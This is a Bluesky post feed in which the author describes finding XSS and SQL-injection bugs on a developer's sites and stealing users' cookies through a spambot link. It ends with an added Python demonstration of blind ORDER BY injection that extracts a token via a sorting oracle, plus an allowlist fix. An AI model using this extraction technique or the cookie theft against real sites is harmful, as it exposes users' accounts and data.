#1 skybucks millionaire
richardwrites672.bsky.social
adrianus websites try not to have every vulnerability type challenge
adrianus count: 4 XSS (technically 5 if you count the firstpost XSS), 10 SQLi
non-adrianus count: 15 XSS, 6 SQLi, 1 hamburger, 5 auth bypass, 10+ "chatDisabled":true
https://6v.pages.dev
The site has come back up, and vulnerabilities that used to be fixed are now no longer fixed for some reason, so there are even more ways to steal twexit accounts now compared to when he shut the site down.
August 12, 2024 at 8:17 PM
I found multiple XSS bugs just about daily (so I could steal the twexit cookies of anyone who clicked on the twexit link I had a spambot post), and then retr0id (and later me) found some SQL injection bugs and adrianus shut the site down.
August 12, 2024 at 8:15 PM
mayhaps
January 14, 2024 at 8:04 PM
December 28, 2023 at 6:14 AM
It is an adrianus project, yes. The domains (mastochist.com and mastochist.nl) don't resolve, but you can still access it by setting an /etc/hosts entry with the IP of the twexit server.
December 26, 2023 at 6:02 AM
To make my point clearer:
If I had just reported the bugs to you, nothing would have changed. There would be more bugs to take their place, and people who didn't want to make it as public as I did would have taken advantage of them. It's likely some already have.
Instead, your websites are down.
December 25, 2023 at 1:06 AM
Because given your other posts about how having common bugs in your app "ruined your reputation", I doubt it.
Do you think no one took advantage of the SQL injection vulnerabilities present in your older project Twopcharts? Because I heavily doubt that as well.
December 25, 2023 at 12:42 AM
I've never tried to frame my actions as being "absolutely fine" and I'm not sure why you're attempting to say that.
I do want to ask you: If I had just privately reported the issues to you, would you have made people aware that their information was at risk from using your service?
December 25, 2023 at 12:41 AM
Emails and bluesky login tokens were out in the open though, which absolutely is a real concern.
December 24, 2023 at 7:20 PM
The main issue with this one is that it's injection into an ORDER BY/LIMIT query, and the only exploitation strategy I could find for it was very restrictive and seemingly didn't allow for SELECT statements.
I've found a (potentially) better sqli method that I'm still investigating though.
December 22, 2023 at 2:46 PM
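The post above describes injection into an ORDER BY/LIMIT clause, where appending a SELECT is not possible. The following is an added illustration of why that position is restrictive and what is still reachable from it; it is example code written for this page against a constructed in-memory SQLite schema, not code from the author or from the site discussed. It assumes a listing endpoint that interpolates a user-controlled sort key into ORDER BY (hypothetical `vulnerable_listing`), a hidden `users.token` column, and that the engine accepts subqueries inside the ORDER BY expression; whether that last assumption holds on a real target depends on the database and any filtering in front of it.

```python
import sqlite3
import string

# Constructed, in-memory schema for the demonstration (not the real target).
def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE posts(id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO posts(title) VALUES (?)",
                    [("zebra",), ("apple",), ("mango",)])
    con.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, token TEXT)")
    con.execute("INSERT INTO users(name, token) VALUES ('admin', 'sekrit-token')")
    return con

def vulnerable_listing(con, sort: str) -> list:
    # VULNERABLE (hypothetical endpoint): the sort key is interpolated
    # straight into ORDER BY, with a fixed LIMIT after it.
    sql = f"SELECT id, title FROM posts ORDER BY {sort} LIMIT 10"
    return [title for _, title in con.execute(sql)]

def union_payload_fails(con) -> bool:
    # A UNION SELECT appended after ORDER BY is rejected by SQLite, because
    # ORDER BY must follow the whole compound select. This is the "no SELECT
    # statements" restriction of an ORDER BY injection point.
    try:
        vulnerable_listing(con, "title UNION SELECT name, token FROM users --")
    except sqlite3.OperationalError:
        return True
    return False

def oracle(con, condition: str) -> bool:
    # What the position does allow: a conditional expression. Sort by title
    # when the condition holds and by id otherwise; the first row returned
    # reveals which branch ran, i.e. one boolean about the hidden data.
    payload = f"(CASE WHEN ({condition}) THEN title ELSE id END)"
    return vulnerable_listing(con, payload)[0] == "apple"

def extract_token(con, max_len: int = 40) -> str:
    # Boolean-based extraction of users.token one character at a time.
    charset = string.ascii_lowercase + string.digits + "-"
    out = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = (f"(SELECT substr(token,{pos},1) FROM users "
                    f"WHERE name='admin')='{ch}'")
            if oracle(con, cond):
                out += ch
                break
        else:
            break  # no character matched: end of token
    return out

ALLOWED_SORT = {"id": "id", "title": "title"}

def safe_listing(con, sort: str) -> list:
    # Hardened form: ORDER BY cannot take a bind parameter, so map the
    # user-supplied key through an allowlist and reject everything else.
    if sort not in ALLOWED_SORT:
        raise ValueError(f"unsupported sort key: {sort!r}")
    sql = f"SELECT id, title FROM posts ORDER BY {ALLOWED_SORT[sort]} LIMIT 10"
    return [title for _, title in con.execute(sql)]

if __name__ == "__main__":
    db = build_db()
    print("UNION after ORDER BY rejected:", union_payload_fails(db))
    print("Recovered token via ordering oracle:", extract_token(db))
```

The point of the allowlist in `safe_listing` is that parameter binding does not apply to identifiers or clauses, so ORDER BY injection is fixed by never letting user input reach the SQL text at all, not by escaping it.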